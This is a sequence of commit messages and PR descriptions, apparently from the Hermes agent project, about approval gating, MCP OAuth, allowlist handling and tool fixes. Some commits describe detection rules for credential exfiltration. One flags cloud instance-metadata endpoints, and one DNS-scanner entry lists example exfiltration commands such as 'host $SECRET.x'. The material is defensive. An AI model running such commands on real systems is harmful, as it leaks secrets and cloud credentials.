The MCP config reconciler was appended to the gateway/run.py facade; it moves to
gateway/run_profile_reconcile.py, which already owns post-boot MCP discovery, and
run.py keeps only the chore-table entry.
reconcile_mcp_servers_with_config() also drops a schema-cache (lazy) registration
whose entry is gone (its cached tools would otherwise stay callable and spawn the
server on first use) and reports a dropped server still mid-connect as "pending";
the chore retries on the next tick without waiting for another config edit.
test_cron_delivery_housekeeping neutralizes the chore: it pins the exact
scope/drain sequence of the housekeeping loop and the new chore enters each
profile's scope once per tick.
A gateway with an OAuth MCP server whose refresh token expired opened a new
authorize tab every 300s, all night (92 tabs). Four defects stacked:
- The parked-server self-probe re-entered the SDK's authorization-code flow
with interactive OAuth enabled. The timed wake is unattended by definition:
`_wait_for_reconnect_or_shutdown` now distinguishes "self-probe" from an
explicit "reconnect", and `_park` flips the task-local
`_oauth_interactive_enabled` off before a self-probe revival.
- Gateway MCP discovery (startup, `/reload-mcp`, hot-added multiplex
profiles) ran interactive, unlike the CLI's background discovery. All three
now run under `suppress_interactive_oauth()`; an expired token parks with
the `hermes mcp login` hint instead of a browser.
- `_is_interactive()` trusted `sys.stdin.isatty()`, which the Windows CRT
reports True for a DEVNULL/detached stdin. `_stdin_is_console()` confirms
with `GetConsoleMode` on Windows.
- Removing an `mcp_servers` entry (or `enabled: false`) never reached a
running gateway; the parked server probed forever. New
`reconcile_mcp_servers_with_config()` tears down dropped/disabled servers
(via `shutdown_mcp_servers(names=...)`) and connects new ones; a
housekeeping chore runs it when config.yaml's (mtime, size) changes.
`_select_new_servers` also stops nudging disabled parked servers.
Fixes#81830. Fixes the browser-storm item of #96320.
computer_use kept its own approval decision: two module dicts
(_session_auto_approve / _always_allow) mirroring tools.approval's
session store and _persist_choice, a private verdict vocabulary
(approve_once/approve_session/always_approve) that hermes_cli mapped
back to once/session/always, and — the real problem — `if
_approval_callback is None: return None`. Only the interactive CLI ever
installed that callback, so every other host (gateway turns, cron,
api_server, tui_gateway, ACP) ran destructive desktop input with no
approval at all, ignoring cron_mode / unattended_mode / the permanent
allowlist, and "always" grants were invisible to `is_approved`,
`clear_session` and the messaging-platform approval buttons.
_request_approval now calls tools.approval._run_approval_gate with
pattern_key `cua:<action>:<background|foreground>` (the old scope shape,
so a background grant still never covers the visible foreground variant)
and fail_closed_when_no_human=True, the same posture as
request_tool_approval / the SSH-config write gate. The private dicts,
their release/atexit clearing, the verdict mapping in
hermes_cli/cli_modal_mixin.py and the extra callback install in cli.py
are deleted: the CLI's terminal_tool callback answers computer_use
prompts like any other tool. set_approval_callback stays as an optional
explicit-callback hook with the shared callback contract
(cb(command, description, **kw) -> once|session|always|deny|timeout);
no in-tree host uses it.
Behavior change:
- No approval callback and no gateway (cron, api_server/webhook,
headless -q, plain library use): destructive actions are now REFUSED
with a BLOCKED error and never reach the backend. Previously they
silently ran. cron honors approvals.cron_mode, unattended platforms
approvals.unattended_mode, -q approvals.single_query_mode.
- --yolo / gateway /yolo / approvals.mode: off still allow (unchanged).
- Gateway sessions (Telegram/Discord/Slack/...) now get a real pending
approval with once/session/always buttons instead of default-allow.
- session/always grants live in tools.approval's store; "always" is one
command_allowlist entry (`cua:click:background`) and is scoped to that
action+mode — the old blanket "always_approve unlocks everything for
the session" no longer exists.
- Denial wording is the shared gate's ("BLOCKED: User denied ...",
"BLOCKED: Action timed out ..."); the error JSON keeps `action`.
Tests: tests/tools/test_computer_use_approval_isolation.py
::test_no_callback_refuses_unless_yolo (blocked + no backend call, then
yolo executes) and ::test_always_grant_lands_in_the_shared_store
(is_approved sees the cua:<action>:<mode> key; second call served from
the store). Sabotage: restoring the `callback is None -> allow`
short-circuit fails the first; swapping the shared gate for a private
grant set fails the second plus the three delivery-ladder scope tests.
tests/tools/conftest.py gains `grant_computer_use_approvals` for
dispatch tests that only care about routing.
Seven sites hand-rolled `float(headers.get("Retry-After"))` (anon_auth,
shared_metrics_sender, gemini_native_adapter, extract_api_error_context,
nous_rate_guard, skills_hub_github, skills_hub_clawhub x2) and silently
dropped RFC 7231 HTTP-date values that the conversation loop already honours
via agent/retry_utils.py::parse_retry_after_seconds. They now call it; per-site
caps/floors stay at the call site.
The free-text "resets in / quotaResetDelay / retry after N s" regexes lived in
two tables (agent_runtime_helpers vs credential_pool) whose "resets in"
grammars diverged: the pool accepted only integer `Nhr Nmin` while the error
context accepted h/hr/hours + m/min/minutes + s/seconds with decimals. One table
(agent/retry_utils.py::RETRY_DELAY_PATTERNS / reset_delay_from_message) using
the wider grammar, so a pooled credential's cooldown and the UI's reset time
now agree.
doctor_live and kanban_decompose carried byte-identical
`try: load_config() or {}` wrappers; local_models wrapped load_config in
_quiet; each is now a direct load_config_readonly() call (read-only callers;
the canonical already fails open and returns a mapping). Tests that patched the
local wrappers patch hermes_cli.config.load_config_readonly instead.
tools/code_execution_tool._load_config read the RAW file, so a managed-pinned
`code_execution.mode` and the DEFAULT_CONFIG keys were invisible at tool
discovery — it now reads load_config_readonly() (behavior change: the managed
overlay applies to execute_code's mode/timeout). onboarding.mark_seen and
credential_lifecycle's config mirror scrub parsed config.yaml with a bare
safe_load; both are read→mutate→write round-trips and use read_user_config_raw,
the documented write-back primitive.
hermes_cli/runtime_provider._getenv was a 4-line copy of get_secret(name,
default) or default; it becomes agent.secret_scope.get_secret_str (returns
default only when the secret is genuinely unset, still raises
UnscopedSecretError — a child's unscoped read is a spawn-site bug). The
runtime_provider_backends/_custom siblings call it directly instead of via
the origin module.
tools/tts_tool, tools/transcription_tools and tools/xai_http each carried an
identical get_env_value re-export kept "so tests can patch" it; the seam is
hermes_cli.config.get_env_value, read lazily at call time. Callers
(tts_streaming, tts_tool_providers, transcription_cloud, voice_client_config,
tools_config) go there directly; resolve_provider_secret already defaults to
it so the env_getter kwarg is gone. Tests repointed at the canonical; the two
tests that only proved the shim forwarded are deleted.
Behavior change: none.
reseed_if_terminal created its temp as <auth>.rebootstrap.<pid>.tmp with
O_CREAT|O_EXCL. Boot-hook PIDs inside a container are near-deterministic,
so a run SIGKILL'd between create and replace leaves a same-named file and
every later boot hits FileExistsError - which main() swallows as
"error (ignored)", leaving the terminal-session recovery path dead until
someone deletes the temp by hand.
tempfile.mkstemp in the auth dir gives a random name at 0600 (stdlib only,
matching the script's no-hermes-imports rule); the fsync + os.replace +
unlink-on-failure semantics are unchanged.
meta/muse-image/text-to-image + paired meta/muse-image/edit, the FAL
listing of Meta's Muse Image model (launched on the Meta Model API in
Aug 2026 at $0.01/image).
- aspect_ratio size family (16:9 / 1:1 / 9:16 from the vendor's
21:9..9:21 enum); always sent on t2i for deterministic framing,
deliberately omitted on edits so Muse follows the input image.
- No seed in the vendor schema (Grok Imagine 2.0 precedent) - the
supports whitelist filters it.
- Edit takes 1-10 reference image_urls (max_reference_images=10).
Schema verified against FAL's OpenAPI for both endpoints. Live E2E
blocked by the FAL account balance lock (403), same as prior catalog
additions.
Port from earendil-works/pi#9300 fix (acaa253cc): a plugin registering a
tool whose schema["parameters"] is not a dict (a list, string, etc.)
previously registered fine and the malformed schema was serialized into
every provider request, 400-ing turns far from the offending plugin.
Live probe on main confirmed the bad schema flows into _fn_def() and the
OpenAI wire unchanged.
Fail at registry.register() with the tool name in the error instead. The
plugin loader already catches registration exceptions and marks the
plugin errored, so a broken plugin degrades gracefully rather than
breaking every session. Schemas that omit "parameters" stay valid
(no-argument tools); MCP tools are unaffected (their schemas pass
through _normalize_mcp_input_schema first, which always returns a dict).
Programs run via terminal(background=true, pty=true) can block forever when
they probe their terminal — device-status (ESC[5n), window-size (ESC[18t),
cursor-position (ESC[6n), or DEC private-mode (ESC[?N$p) queries — because
nothing on the PTY master side answers, and the raw query bytes leak into
captured output.
- tools/pty_query_responder.py: incremental byte scanner that strips the
handled queries from PTY output (chunk splits included) and produces
bounded replies; everything else passes through untouched.
- tools/process_registry.py: wire the responder into _pty_reader_loop
(POSIX only — ConPTY answers its own queries); flush partial escape
tails at end-of-stream.
- tests mirror the codex fixtures plus a live-PTY E2E where a subprocess
blocks on ESC[6n until answered.
Carve the direct-child list reconciliation from Indigo Karasu's earliest
PR #60506 (2a96ae2cbf806ccdc3e9b584911774f32622f421), corroborated by
fangliquanflq's narrow #81385 (50ffd243d92627e4a03a3ee8427ad0f5e090c3ab).
Run the existing helper after task/session filtering and reuse the
idempotent owner-stamped completion path. Do not import cross-session
disclosure, bare-PID healing, forget RPCs, or reader rewrites.
A real-child regression fails before this change and passes after it:
the direct child exits while its descendant keeps writing to stdout;
listing reports exit without consuming the result or waiting for EOF.
Co-authored-by: fangliquanflq <fangliquan@qq.com>
Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>
The multiplex-scoped rebase replaced the flat _permanent_baseline set with
_permanent_baseline_by_home (keyed by profile home, "" = unscoped); the
fixture must reset and seed that map.
Review follow-up. Two of the three items taken as written; the third declined
with a reason.
1. Taken. The reconcile semantics mean `patterns` may only ADD -- an entry left
out of it is not removed, because the on-disk list wins for anything this
process did not approve itself. Every caller in the tree is additive today,
so nothing breaks, but the signature does not say so. Stated in the
docstring, and pinned by
`test_a_caller_that_passes_a_smaller_set_does_not_remove` so a future
`allowlist remove` finds out here instead of in production.
NOT taken: the `reconcile: bool = True` opt-out. There is no caller that
wants it, and AGENTS.md:98-101 names exactly this -- "Speculative
infrastructure. Hooks, callbacks, or extension points with no concrete
consumer." The removal path is editing config.yaml, which the docstring now
says.
2. Taken. website/docs/user-guide/security.md, next to the existing
`hermes config edit` tip, which is where an operator reads about removing a
pattern: the list is read at startup, a pattern removed while a session is
running stays approved in that session until the next write or a restart,
and if it was removed for safety reasons, restart.
3. Taken. `test_save_failure_is_logged_not_raised` asserted non-raising but
never asserted the log its name promises. Now asserts
"Could not save allowlist" via caplog.
scripts/run_tests.sh tests/tools/test_permanent_allowlist_reconcile.py
=== Summary: 1 files, 9 tests passed, 0 failed (100% complete) in 0.4s
`load_permanent_allowlist()` runs exactly once, at module import
(tools/approval.py, the call at the bottom of the module), and
`load_permanent()` only unions into `_permanent_approved` (:2866-2869) --
nothing ever removes. `save_permanent_allowlist()` then wrote that in-memory
set straight back over `config["command_allowlist"]`, at eight call sites.
`command_allowlist` is a file the operator edits, and deleting a line from it
is the documented way to withdraw a standing approval. Any hand edit made
while a Hermes process is live was undone by that process's next `[a]lways`,
in both directions at once.
Reproduced on this tree with a temp HERMES_HOME:
BEFORE (tools/approval.py at fcbd107)
on disk before this process starts : ['git status', 'ls *']
operator edits config.yaml by hand : ['ls *', 'npm test']
(revoked 'git status', added 'npm test')
after ONE [a]lways : ['docker *', 'git status', 'ls *']
is_approved still honours revoked? : True
AFTER
after ONE [a]lways : ['docker *', 'ls *', 'npm test']
is_approved still honours revoked? : False
`npm test` was silently deleted from the operator's own config file, and
`git status` -- a standing approval they had just withdrawn -- was written
back and kept auto-approving. Neither prints anything.
The same shape loses writes between two live Hermes processes: whichever
saves second overwrites the other's entry.
The fix reconciles at write time. The file is re-read and the result is what
is on disk now, plus what this process approved since its own baseline, where
the baseline is what `command_allowlist` held the last time this process
synchronised with the file. That difference is what separates "the operator
granted this here" from "this was on disk at import and may since have been
revoked". Revoked entries are also dropped from `_permanent_approved` so
`is_approved()` stops honouring them for the rest of the process.
It does NOT make a revocation take effect the instant the file changes --
nothing re-reads the file on the approval hot path, and adding a stat there is
a separate change with its own cost. It makes the next write stop undoing the
operator's edit.
`_lock` is `threading.Lock` and not reentrant; all eight call sites were
checked and none holds it across the call, so the added critical section
cannot deadlock. The failure path still logs and returns rather than raising,
as before.
Searched open and merged PRs and issues for `command_allowlist revoke`,
`permanent allowlist reload`, `approval allowlist clobber` and
`save_permanent_allowlist` -- nothing covers this.
Tests: tests/tools/test_permanent_allowlist_reconcile.py, 8 cases -- both
halves of the bug, the two-process race, idempotence, the unedited round trip,
and the existing contract that a config write failure is logged rather than
raised.
scripts/run_tests.sh tests/tools/test_permanent_allowlist_reconcile.py
=== Summary: 1 files, 8 tests passed, 0 failed (100% complete) in 0.5s
No regression across the 29 test files in tests/ that touch the allowlist or
the approval module: 25 failed before and after, byte-identical failure set
(pre-existing missing-dependency failures in my local venv).
Port from cline/cline#13970: models that send patch calls with an empty
old_string got back 'old_string cannot be empty' — an error that names the
problem but not the recovery, so the next call was byte-identical and the
run burned turns until loop detection killed it (upstream repro: Kimi K3
looping on old_text: null).
The rejection now states the recovery: set old_string to the exact text the
replacement should replace, read the file first if unsure, use write_file
for new files/full rewrites, and do not re-send the call unchanged. The
whitespace-only rejection gets the same treatment. No behavior change for
valid calls.
The streamed download path now routes through the SSRF-safe client, which
(correctly) refuses the test fixture's 127.0.0.1 registry. Set
HERMES_ALLOW_PRIVATE_URLS for the fixture's lifetime and reset the module
cache on both sides so the guard still fail-closes everywhere else.
ClawHub ZIP downloads buffered the entire response before applying member
limits. Stream the archive into a 25 MiB bounded buffer and enforce actual
received bytes even when Content-Length is absent or incorrect.
Use the existing SSRF-safe client with bounded redirects and recheck URL and
website policy at every hop. Close responses before retry delays, clamp
Retry-After, and stop after the third rate-limited response without attempting
ZIP extraction. Preserve member path validation and raw-file fallback.
Related #29450
Co-authored-by: sprmn <oncuevtv@gmail.com>
Co-authored-by: teknium1 <127238744+teknium1@users.noreply.github.com>
A provider whose backend keeps the response open without finishing (hanging
HTTP server, stuck SDK call) stalled the web_extract tool call — and with a
sync provider, the borrowed thread — indefinitely. The dispatch in
tools/web_tools_extract._dispatch_extract now runs under asyncio.wait_for with
web.extract_timeout (config.yaml, default 120s; 0 disables). On timeout the
tool returns structured per-URL error entries, and the one-shot keyless rescue
still gets its chance when eligible.
Salvaged from PR #57180 by @liuhao1024 (base predated the web_tools
decomposition; re-applied at the _dispatch_extract seam, env-var timeout
replaced with the web.* config section per the .env-is-for-secrets rule, and
the timeout path made rescue-aware).
Inspired by Claude Code 2.1.268: "Fixed WebFetch hanging indefinitely on a
server that keeps the response open without finishing; a fetch now fails
after 300 seconds."
Fixes#57155
Co-authored-by: liuhao1024 <sunsky.lau@gmail.com>
A user message sent mid-turn (CLI busy_input_mode=interrupt, gateway priority
redirect, ACP redirect) goes through AIAgent.redirect(), which during tool
execution degrades to steer() + request_yield() on the tool worker threads.
The local terminal backend's foreground wait honours the yield (adopting the
process into the background registry), but ProcessRegistry.wait() — the
process_manage(action='wait') path — never checked it: a model sitting in a
wait on an already-background process parked the user's message for up to the
full wait window (default 180s, clamp allows more).
wait() now consumes a pending yield on its own thread each poll pass and
returns status "interrupted" with process_running=true and a note telling the
model to respond to the user; the process is untouched and still
notify-tracked. The plain-interrupt and timeout paths are unchanged.
Live repro: on origin/main, request_yield() against a thread blocked in
wait(timeout=12) had no effect (wait ran to timeout); after this change the
wait releases in <1s with status=interrupted, process still running.
Port of MoonshotAI/kimi-code#3697 ("let steer interrupt background task
waits") adapted to Hermes' per-thread yield mechanism from 463292351f.
A V4A `*** Add File:` operation is meant to create a new file. The apply
path called `write_file` unconditionally and `_validate_operations` had no
pre-check for ADD, so an Add targeting a path that already existed
overwrote the file with only the patch's `+` lines, returned success, and
emitted a `--- /dev/null` diff that hid what was lost. Models frequently
confuse Add with Update, so this destroyed existing file contents with no
error. The MOVE path already guards its destination against clobbering;
ADD now follows the same rule.
Makes a V4A `Add File` operation fail when its target already exists,
instead of silently overwriting the existing file. Validation now rejects
the operation before any write happens, so the two-phase
validate-then-apply contract ("no files were modified" on a validation
failure) holds for ADD as it already does for UPDATE/MOVE/DELETE. A
matching re-check in the apply phase closes the validate-to-apply race.
N/A
- [x] 🐛 Bug fix (non-breaking change that fixes an issue)
- `tools/patch_parser.py`: add an ADD branch in `_validate_operations`
that errors when `read_file_raw` finds an existing file, and a
defensive existence re-check in `_apply_add` before `write_file`,
mirroring the existing MOVE destination guard.
- `tests/tools/test_patch_parser.py`: add a test asserting an Add onto an
existing path fails validation and leaves the original bytes unwritten;
add `read_file_raw` to three ADD-path LSP fakes so they match the real
`file_ops` interface now exercised on ADD.
1. Build a V4A patch with `*** Add File: <path>` where `<path>` already
exists on disk.
2. Apply it via `apply_v4a_operations`. Before this change the file is
overwritten with the patch's `+` lines and the result is success;
after, the result is a validation failure and the file is untouched.
3. Run `scripts/run_tests.sh tests/tools/test_patch_parser.py` —
`TestApplyOperations::test_add_onto_existing_file_fails_and_preserves_contents`
covers the regression.
- [x] I've read the [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md)
- [x] My commit messages follow [Conventional Commits](https://www.conventionalcommits.org/) (`fix(scope):`, `feat(scope):`, etc.)
- [x] I searched for [existing PRs](https://github.com/NousResearch/hermes-agent/pulls) to make sure this isn't a duplicate
- [x] My PR contains **only** changes related to this fix/feature (no unrelated commits)
- [x] I've run `pytest tests/ -q` and all tests pass
- [x] I've added tests for my changes (required for bug fixes, strongly encouraged for features)
- [x] I've tested on my platform: macOS 15 (Darwin 25.5.0)
- [x] I've updated relevant documentation (README, `docs/`, docstrings) — or N/A
- [x] I've updated `cli-config.yaml.example` if I added/changed config keys — or N/A
- [x] I've updated `CONTRIBUTING.md` or `AGENTS.md` if I changed architecture or workflows — or N/A
- [x] I've considered cross-platform impact (Windows, macOS) per the [compatibility guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#cross-platform-compatibility) — or N/A
- [x] I've updated tool descriptions/schemas if I changed tool behavior — or N/A
On a cloud VM the instance-metadata service hands live IAM/service-account
credentials to any local process with no auth, so a fetch against it is
credential exfiltration unless the operator expects it — yet
detect_dangerous_command() auto-approved `curl` against the link-local
metadata IP, metadata.google.internal, and the Alibaba endpoint. Add one
DANGEROUS_PATTERNS entry covering 169.254.169.254 (AWS/Azure/GCP/OpenStack),
its AWS IPv6 form fd00:ec2::254, metadata.google.internal, and Alibaba's
100.100.100.200. The host literals have no other use, so their appearance in
a command is the signal regardless of HTTP client; lookarounds keep other
169.254.x.x link-local addresses and longer host/dotted strings out.
This prompts for approval (legit uses exist on real cloud VMs); it is NOT a
hardline block. Deterministic containment-escape detection at the approval
layer, same class as the existing credential-path detectors.
Relocated onto the decomposed module layout and hardened:
- Trigger covers the rejection CLASS, not just literal 400: SSE-only
servers' load balancers answer the chunked Streamable HTTP initialize
POST with 400/405/406/411, and the mcp>=2.0 SDK surfaces many such
rejections as an opaque -32603 'Server returned an error response'
(error class per #104363 by @RohithPariki). Timeouts and 5xx never
trigger the fallback: they are not transport mismatches.
- Reconnect exclusion via _ever_connected instead of _ready: run()
clears _ready before re-entering the transport, so the original guard
also fired on reconnects after a proven session.
- Successful fallback latches _sse_fallback so reconnects go straight
to SSE, and logs a warning suggesting the user pin transport: sse.
- Both transports failing raises a ConnectionError naming both errors
and suggesting transport: sse / checking the URL.
- No fallback with strict_redirect_headers (SSE cannot enforce that
boundary) or when transport is explicitly configured.
- Tests trimmed to 3 invariant contracts (proven red on base): fallback
connects + latches; no fallback on reconnect/timeout/5xx; both-fail
error is actionable.
The extracted SSE path reuses _sse_transport/_serve_transport from main,
preserving the bounded handshake timeout and reconnect-retry semantics.
Fixes#53676
SSE-only MCP servers (e.g. WigAI for Bitwig Studio) reject the
Streamable HTTP initialize request with 400 Bad Request, causing
permanent failure with 0 active tools. The only workaround was
manually setting transport: sse in config.
When Streamable HTTP returns 400 during initial connect, log a
warning and retry with SSE before reporting failure. Reconnects
are excluded so a genuine 400 on an established transport is not
silently masked.
Extracted inline SSE code into _run_sse() helper shared by the
explicit config path and the new fallback path.
Fixes#53676
Unpinned cron jobs snapshot the global provider/model at creation and fail
closed when the global default drifts (#44585). Pinning was the only way
forward, but it makes a job stop tracking the global default forever.
Add resnap: refresh an unpinned job's provider/model snapshot to the CURRENT
global resolution without pinning it, so it adopts the user's deliberately
changed default while keeping tracking future changes. Single job via
cronjob(action='resnap', job_id=...) or hermes cron resnap <id>; bulk via
cronjob(action='resnap', all=true) or hermes cron resnap --all. Refuses to
guess scope when neither is given. The drift-guard alert now points at both
options (pin vs resnap). No inference call is made — it recomputes the
snapshot string from config.
When a persistent Docker container is removed out-of-band or a Vercel
sandbox hits a terminal state, the backend silently recreates it and
retries. The model then keeps assuming background processes and
non-persisted files from earlier commands still exist.
Backends now call _mark_recreated() after a successful recovery;
BaseEnvironment.execute() folds the one-shot flag into the result as
environment_recreated, and finalize_foreground_result() attaches a
model-facing warning field explaining what may have been lost.
Ported from lobehub/lobehub#19329 (sandbox recreation surfacing),
adapted to hermes environment backends and tool-result JSON.
Two long-standing, mutually-masking defects in read_file's line accounting,
present on all three read paths (compound shell probe, sequential probes,
native):
1. total_lines came from `wc -l`, which counts newline bytes: a file whose
final line has no trailing newline was undercounted by one. For an
N*limit+1-line file read in pages, the last page was never offered
(truncated=False) and the past-EOF guard refused `offset=total` reads of
the real final line.
2. _add_line_numbers() split on '\n' without dropping the single terminating
newline, so every well-formed newline-terminated file rendered a phantom
`N+1|` empty gutter line that does not exist in the file (models routinely
tried to patch/reference it). Exactly one terminator is dropped, so a
genuinely selected trailing blank line keeps its number (`cat -n`
semantics).
Both fixes land at the shared choke point (_assemble_read_result /
_add_line_numbers) so the compound, sequential, and native paths agree.
Existing tests that froze the buggy rendering as expected output are updated
to the corrected contract.
Salvages community PRs #106888 (@nikkoxgonzales) and #49453
(@MaxFreedomPollard); same bug class independently reported/fixed in
#3907/#3908, #3927, #20814, #22945, #42929, #55696, #91306.
Cross-validated against anomalyco/opencode#47420's read-page serialization
fix (their trailing-blank-line class; hermes' page path is already
blank-line-safe once the terminator handling is right — verified live).
_add_line_numbers split on '\n', so a file ending in a newline (the normal,
well-formed case) produced a trailing empty element that got its own line
number. read_file therefore showed a phantom '<N+1>|' line that is not in the
file, on every terminal backend and every OS, matching neither cat -n nor the
reported total_lines. Drop the single terminating newline before splitting.
Fixes#49451
wc -l counts newlines, not lines, so a file without a trailing newline
reported one fewer total_lines than the content it returned. The read
paths already probe the last byte (file_ends_with_newline) to strip cut's
phantom newline; use that same signal at the shared assembler choke point
so total_lines, truncation, and the past-EOF guard agree on every path
(compound, sequential, native).
Fixes#3907. Supersedes #3908: single adjustment instead of a per-path
helper, covering the native and sequential paths as well.
tools/async_delegation.py:_connect() opens the same state.db as
SessionDB via a bare sqlite3.connect(), bypassing the owner-only
(0600) hardening added for SessionDB. Apply the same
_create_owner_only / _secure_wal_files policy here, reusing
hermes_state's helpers (managed/container skip included).
Addresses teknium1's review on #59716.
Co-Authored-By: Claude Sonnet 5 <noreply@anthropic.com>
The salvaged #103267 plugin hardcoded a single model (minimax/hailuo-3-max) and
rejected any other id. OpenRouter's public GET /api/v1/videos/models already
publishes every generative model with its supported durations, resolutions,
aspect ratios, frame-image support, audio and seed flags, and pricing SKUs, so
the provider now reads that catalog (5-min TTL, offline snapshot fallback):
- list_models(): all 25+ generative models (edit/upscale/avatar rows that take
no duration are outside the unified video_generate surface and are dropped)
with a per-second price label where the SKU is per-second
- capabilities(): the CONFIGURED model's surface, so the dynamic schema only
advertises audio/seed/resolutions the selected model honours
- _build_payload(): clamps duration/resolution/aspect ratio to the model's
live limits (nearest by value/height/ratio) and drops generate_audio/seed
for models that lack them (the API 400s otherwise); reference images ride
in input_references; local file inputs are refused (OpenRouter fetches
URLs itself), data:image/ URLs from the sandbox chokepoint pass through
- bearer key only ever goes to the configured origin (poll + /content),
never to a provider-supplied unsigned_urls host (kept from #103267)
Also drops the source-grep `_IGNORES_SEED` escape hatch #103267 added to the
declaration⇄implementation sweep; the provider now implements seed for real.
Docs list OpenRouter and DeepInfra as bundled video backends.
Requested by Don Piedro Savastano (Discord): OpenRouter credit for video_generate.
Salvage follow-up to Xipong's #107736. Kept the core: `kanban` is a
configurable, default-off toolset whose check_fn answers the schema
build's own selection (ContextVar) instead of the legacy top-level
`toolsets` key, so `platform_toolsets.<platform>: [.., kanban]` — what
`hermes tools enable kanban --platform X` writes — actually reaches the
gateway agent's tool schema.
Dropped the `tui_gateway/server.py` change: turning an explicitly empty
CLI selection from "all" into "nothing" is a separate behaviour flip
already tracked by #107452, not part of this bug. The two TUI loader
tests that asserted `kanban` is auto-recovered onto a saved `[memory]`
list now assert the opposite: a configurable opt-in is never recovered.
Application errors (isError payloads) keep counting as breaker strikes:
that is #10447's point (a server answering errors made the model hammer
it 8x in 10s) and #109180 just reasserted it. What #11113 actually hit is
the open-breaker MESSAGE: after three rejected fetches the model was told
the server was "unreachable" and went to the user instead of fixing its
URL. Track whether the streak was all application errors and word the
pause accordingly; one transport strike restores the unreachable text.
A second Ctrl+C while the atexit hook joins the browser janitor thread
surfaced as "Exception ignored in atexit callback: _stop_browser_cleanup_thread"
with a KeyboardInterrupt traceback. The janitor is a daemon thread and the
interpreter is already exiting, so nothing is lost by swallowing the
interrupt — the terminal tool's sibling _stop_cleanup_thread already does.
Salvaged from #10765 (function has since moved to browser_tool_lifecycle.py).
Fixes#10764
Co-authored-by: LehaoLin <lehaolin98@outlook.com>
The package-manager uninstall patterns were bare \b-anchored, so quoted
prose (`git commit -m "document npm uninstall usage"`) prompted while the
real `npm --prefix DIR uninstall x` slipped past because the option group
did not allow an operand. Use the file's _CMDPOS anchor like every other
command-name rule and let each global option take one operand.
Found by independent review before merge.
The cap only fires on add/replace, so an externally written over-budget
file rode silently in the system prompt while every later add was refused
with no visible cause. Warn at load; entries stay loaded (never truncate
a user's memories).
Salvage of #10886 (original hunk targeted memory_tool.py before the
store split); authored by @easyvibecoding.
Refs #10877
The pick returns the real result after a transport recovery instead of
dropping it, but it also skipped the breaker bookkeeping. Application
errors counting as strikes is the point of the breaker (3ff18ffe14,
#10447: a server answering errors made the model hammer it 8x in 10s).
Route the recovered result through _record_call_outcome so the caller
sees the tool's answer and the counter still moves the right way.
~480 scientific research skills become searchable/installable through the Skills Hub
with nothing vendored: K-Dense-AI/scientific-agent-skills (165, MIT) and
synthetic-sciences/openscience (314 across 17 category paths, Apache-2.0).
A new optional tap-level `bucket` key stamps extra["category"] on every skill from a
tap whose repo ships no skills.sh.json grouping, so several repos surface as one hub
category; a sidecar grouping still wins when present. Both repos stay at community
trust (not in TRUSTED_REPOS) so the guard scans every install.
Re-grafted from #60559 onto the post-split tools/skills_hub_github.py.
Every scheduled skills-index.yml run since 2026-07-20 was cancelled at the 15-minute
job timeout, so the live skills-index.json has been frozen at that date and every
`hermes skills search` fell through to live GitHub API calls (~500 inspect requests per
cold search, against a 60/hr unauthenticated budget). The freshness watchdog has been
appending to #66616 four times a day since.
Root cause: enrich_owners() walks every ClawHub skill's detail endpoint (~2s each) to
fetch an owner handle for the "View source" link. The catalog grew from ~50k to 78k
skills, so even at 30 workers that phase alone runs over an hour; nothing bounded it.
- enrich_owners() gains budget_seconds: on expiry it stops and ships the remainder
without an owner (the link is a nicety; the index is not).
- build_skills_index.py passes an 8-minute budget.
- skills-index.yml build job timeout 15 -> 50 min to cover the measured critical path
(clawhub walk ~14 min || github taps ~8 min, skills.sh resolve ~6 min, enrichment 8 min).
`(dig|nslookup|host)\s+[^\n]*\$` matched any line where the word "host"
was followed, anywhere later, by a `$` -- "Set the host value and run
`${SKILL_DIR}/scripts/check.py`" was a CRITICAL DNS-exfiltration finding
that blocked a one-file community skill from installing (#108873).
DNS exfiltration puts the data in the queried NAME, so the pattern now
requires the interpolation in the first positional argument (after
optional -flags with values, +opts and @server). Real `host $SECRET.x`,
`dig @1.2.3.4 +short $TOKEN.x`, `nslookup -type=txt "$KEY".x` and
`host -t txt ${API_KEY}.x` still flag; the llama.cpp `--host ... $PORT`
exemption is preserved.
Camofox VNC one-shot, computer-use aux-vision verdict, tirith binary path, MCP
discovery lock path, remote-backend probe text, learned image token costs,
auxiliary per-task semaphores and the custom-endpoint /models memo all held one
profile's config-derived value for the whole process. The skill-sync debounce
Timer ran with empty ContextVars, so a secondary's write pushed as the launch
profile (and cancelled its pending push).
Each memo is now keyed by hermes_home_key() (or credential fingerprint for the
per-key catalog) under an override; the timer is per home and runs its callback
inside the scheduling turn's copied context. Unscoped slots are unchanged.
* feat(desktop): give Button a loading prop that swaps label for spinner without layout shift
The label stays in the box, invisible, and the spinner is absolutely
centred over it, so a Connect or Approve button keeps its width while it
works instead of collapsing to a spinner. The approval bar had the same
thrash and moves onto it.
* refactor(desktop): one consent card for connectors and MCP setup
McpSetupTool rendered its own copy of the connector card's markup. It now
renders ConnectorCard for the pending question and ConnectorSummary once
settled, and the card gains what MCP needed: keyboard accelerators, a
source line, a question heading. The card also gets an avatar variant
(40px mark in the left gutter, text and buttons on one column) and a
collapseWhenSettled switch so a connector can stay a full card with a
green Connected pill in the action slot while MCP keeps its one-line
summary. Brand marks for Gmail, Calendar, Drive, Discord, Telegram and
Spotify; Slack via Tabler because simple-icons dropped the mark.
* feat(desktop): connector card drives the agent through manage_connections wait
The offer used to end in a Continue in chat button, and the agent, seeing
an unconnected status, would improvise around the app. Now the card does
what the TUI does. Clicking Connect opens the browser and sends one hidden
line telling the agent to park in manage_connections action=wait for that
slug and to never call connect again (a second link cancels the one being
signed into). Not now sends its own line. A hidden request that lands
while the turn is busy steers it, or queues if the turn just ended.
Which call owns the live card changes too: consecutive calls naming the
same apps are one exchange (connect, the wait, the status that follows),
and the first of the last exchange is the card, so the agent's wait no
longer demotes the card mid-authorization and mints a fresh one below it.
A targeted ask renders one or two bare cards; only a real catalog gets the
header, search and refresh.
* feat(desktop): onboarding connects apps in chat and keeps tasks finishable without them
The welcome chat knew connectors only as preferences to pick and wire up
later, so asked to connect Gmail it invented a Settings page that does not
exist. Both scripts now carry one rule set: status once, one batched
connect for every app named, the card is the ask so write a line and end
the turn, never route around a declined app with another client or
credential. The build handoff checks real connection status instead of
asserting none are connected, and the first task must be finishable, not
free of, the apps they picked. The connectors card explains what
connecting means and reports the count on its Continue button.
* fix(tools): resolve the Nous identity for share_auth profiles in the connector gate
